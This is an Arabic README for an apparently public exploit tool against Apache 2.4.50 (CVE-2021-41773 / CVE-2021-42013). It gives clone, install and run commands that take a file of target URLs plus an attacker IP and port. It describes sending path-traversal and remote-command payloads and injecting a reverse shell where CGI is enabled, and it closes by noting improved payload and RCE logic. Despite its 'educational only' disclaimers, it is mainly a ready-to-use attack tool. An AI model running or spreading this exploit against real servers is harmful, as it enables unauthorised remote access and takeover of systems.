
Apache-HTTP-Server-2.4.50-RCE هذه الأداة مصممة لاختبار خوادم Apache بحثًا عن الثغرة الأمنية CVE-2021-41773 / CVE-2021-42013. وهي مخصصة للأغراض التعليمية فقط، ويجب استخدامها بمسؤولية على الأنظمة التي لديك إذن صريح باختبارها.
هذه الأداة مصممة لاختبار خوادم Apache بحثًا عن ثغرة CVE-2021-41773 / CVE-2021-42013. وهي مخصصة لأغراض تعليمية فقط ويجب استخدامها بمسؤولية على الأنظمة التي لديك إذن صريح لاختبارها.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
the text file should contain the url of the target
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



فحص إصدار Apache: لكل عنوان URL في الملف المقدم، يتحقق مما إذا كان الخادم يعمل بإصدار Apache 2.4.50.
إذا كان الخادم ضعيفًا: يحاول استغلال الخادم عن طريق إرسال حمولات (payloads) إما لتفعيل هجمات اجتياز الدليل أو لتنفيذ الأوامر عن بُعد. إذا كان CGI مفعّلاً: يحاول حقن حمولة شل عكسي (reverse shell) للوصول عن بُعد.
للاستخدام التعليمي فقط: السكربت مخصص لأغراض تعليمية لتوضيح كيفية اختبار الثغرات واستغلالها. استخدام هذا السكربت ضد أهداف غير مصرح بها غير قانوني وغير أخلاقي.
الغرض من التعديل: إضافة معالجة إضافية للأخطاء وتحسين منطق الحمولة وخاصية تنفيذ الأوامر عن بُعد (RCE) وإزالة CVE